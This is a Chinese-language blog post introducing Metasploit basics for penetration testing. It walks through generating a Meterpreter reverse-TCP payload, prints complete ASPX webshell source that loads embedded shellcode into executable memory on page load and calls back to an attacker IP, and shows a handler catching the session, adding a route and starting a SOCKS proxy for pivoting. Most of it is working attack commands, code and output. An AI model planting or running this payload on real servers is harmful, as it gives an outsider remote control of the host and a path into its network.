序言

Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。metasploit确实是一款真正的渗透测试之神器。

渗透测试基础准备

1 MSF下面生成各种payload
我们搜索meterpreter的payload


 ?search meterpreter

配置payload


msf > use windows/meterpreter/reverse_tcp
msf payload(reverse_tcp) > show options

Module options (payload/windows/meterpreter/reverse_tcp):

 ? Name ? ? ?Current Setting ?Required ?Description
 ? ---- ? ? ?--------------- ?-------- ?-----------
 ? EXITFUNC ?process ? ? ? ? ?yes ? ? ? Exit technique (Accepted: '', seh, thread, process, none)
 ? LHOST ? ? ? ? ? ? ? ? ? ? ?yes ? ? ? The listen address
 ? LPORT ? ? 4444 ? ? ? ? ? ? yes ? ? ? The listen port

msf payload(reverse_tcp) > set lhost xxx.2x.xxx.56lhost => 104.224.179.110
msf payload(reverse_tcp) > set lport 8090
lport => 8090
msf payload(reverse_tcp) >

查看生成的各种格式


 ?msf payload(reverse_tcp) > generate -h
Usage: generate [options]

Generates a payload.

OPTIONS:

 ? ?-E ? ? ? ?Force encoding.
 ? ?-b <opt> ?The list of characters to avoid: '\x00\xff'
 ? ?-e <opt> ?The name of the encoder module to use.
 ? ?-f <opt> ?The output file name (otherwise stdout)
 ? ?-h ? ? ? ?Help banner.
 ? ?-i <opt> ?the number of encoding iterations.
 ? ?-k ? ? ? ?Keep the template executable functional
 ? ?-o <opt> ?A comma separated list of options in VAR=VAL format.
 ? ?-p <opt> ?The Platform for output.
 ? ?-s <opt> ?NOP sled length.
 ? ?-t <opt> ?The output format: bash,c,csharp,dw,dword,hex,java,js_be,js_le,num,perl,pl,powershell,ps1,py,python,raw,rb,ruby,sh,vbapplication,vbscript,asp,aspx,aspx-exe,axis2,dll,elf,elf-so,exe,exe-only,exe-service,exe-small,hta-psh,jar,jsp,loop-vbs,macho,msi,msi-nouac,osx-app,psh,psh-cmd,psh-net,psh-reflection,vba,vba-exe,vba-psh,vbs,war
 ? ?-x <opt> ?The executable template to use

生成payload,小编是生成aspx的payload


 ?generate -t aspx

具体代码如下


<%@ Page Language="C#" AutoEventWireup="true" %>
<%@ Import Namespace="System.IO" %>
<script runat="server">
 ? ?private static Int32 MEM_COMMIT=0x1000;
 ? ?private static IntPtr PAGE_EXECUTE_READWRITE=(IntPtr)0x40;

 ? ?[System.Runtime.InteropServices.DllImport("kernel32")]
 ? ?private static extern IntPtr VirtualAlloc(IntPtr lpStartAddr,UIntPtr size,Int32 flAllocationType,IntPtr flProtect);

 ? ?[System.Runtime.InteropServices.DllImport("kernel32")]
 ? ?private static extern IntPtr CreateThread(IntPtr lpThreadAttributes,UIntPtr dwStackSize,IntPtr lpStartAddress,IntPtr param,Int32 dwCreationFlags,ref IntPtr lpThreadId);

 ? ?protected void Page_Load(object sender, EventArgs e)
 ? ?{
 ? ? ? ?byte[] upOnTfgQu = new byte[281] {
0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,
0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,
0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,
0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,
0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,
0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,
0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x05,0x68,0x68,
0xe0,0xb3,0x6e,0x68,0x02,0x00,0x1f,0x9a,0x89,0xe6,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,
0x97,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0c,0xff,0x4e,0x08,0x75,0xec,0x68,0xf0,0xb5,0xa2,
0x56,0xff,0xd5,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,
0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x01,
0xc3,0x29,0xc6,0x75,0xee,0xc3 };

 ? ? ? ?IntPtr neKH = VirtualAlloc(IntPtr.Zero,(UIntPtr)upOnTfgQu.Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE);
 ? ? ? ?System.Runtime.InteropServices.Marshal.Copy(upOnTfgQu,0,neKH,upOnTfgQu.Length);
 ? ? ? ?IntPtr ladmo = IntPtr.Zero;
 ? ? ? ?IntPtr mJeW = CreateThread(IntPtr.Zero,UIntPtr.Zero,neKH,IntPtr.Zero,0,ref ladmo);
 ? ?}
</script>

2 反弹监听meterpretrr的shell


msf payload(reverse_tcp) > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > showoptions
[-] Unknown command: showoptions.
msf exploit(handler) > show options

Module options (exploit/multi/handler):

 ? Name ?Current Setting ?Required ?Description
 ? ---- ?--------------- ?-------- ?-----------

Payload options (windows/meterpreter/reverse_tcp):

 ? Name ? ? ?Current Setting ?Required ?Description
 ? ---- ? ? ?--------------- ?-------- ?-----------
 ? EXITFUNC ?process ? ? ? ? ?yes ? ? ? Exit technique (Accepted: '', seh, thread, process, none)
 ? LHOST ? ? ? ? ? ? ? ? ? ? ?yes ? ? ? The listen address
 ? LPORT ? ? 4444 ? ? ? ? ? ? yes ? ? ? The listen port

Exploit target:

 ? Id ?Name
 ? -- ?----
 ? 0 ? Wildcard Target

msf exploit(handler) > set lhost 104.xxx.1x9.1xlhost => 104.224.179.110
msf exploit(handler) > set lport 8090
lport => 8090
msf exploit(handler) > run

[*] Started reverse TCP handler on 104.224.179.110:8090
[*] Starting the payload handler...
[*] Sending stage (957487 bytes) to xxx.2x.144.56[*] Meterpreter session 1 opened (104.xxx.1x9.1x:8090 -> xxx.2x.144.56:54243) at 2017-05-11 02:31:04 -0400

meterpreter > ps

3 建立路由通道


meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > route add 104.xxx.1x9.1x 255.255.255.0 1
[*] Route added

4 建立socks通道


 msf exploit(handler) > search socks
[!] Module database cache not built yet, using slow search

Matching Modules
================

 ? Name ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? Disclosure Date ?Rank ? ?Description
 ? ---- ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? --------------- ?---- ? ?-----------
 ? auxiliary/scanner/http/sockso_traversal ?2012-03-14 ? ? ? normal ?Sockso Music Host Server 1.5 Directory Traversal
 ? auxiliary/server/socks4a ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?normal ?Socks4a Proxy Server
 ? auxiliary/server/socks_unc ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?normal ?SOCKS Proxy UNC Path Redirection

msf exploit(handler) > use auxiliary/server/socks4a
msf auxiliary(socks4a) > show options

Module options (auxiliary/server/socks4a):

 ? Name ? ? Current Setting ?Required ?Description
 ? ---- ? ? --------------- ?-------- ?-----------
 ? SRVHOST ?0.0.0.0 ? ? ? ? ?yes ? ? ? The address to listen on
 ? SRVPORT ?1080 ? ? ? ? ? ? yes ? ? ? The port to listen on.

Auxiliary action:

 ? Name ? Description
 ? ---- ? -----------
 ? Proxy ?

msf auxiliary(socks4a) > run
[*] Auxiliary module execution completed

[*] Starting the socks4a proxy server

metasploit下面各种模块的熟练使用

由于篇幅问题,小编将在以后的文章中展示,如何真正的使用msf进行网络渗透。
喜欢我们就请长按下面的图片关注我们吧。

0?wx_fmt=jpeg metasploit渗透测试哪些事(你所不了解的基础准备)

You may also like

No Comment

You can post first response comment.

Leave A Comment

Please enter your name. Please enter an valid email address. Please enter a message.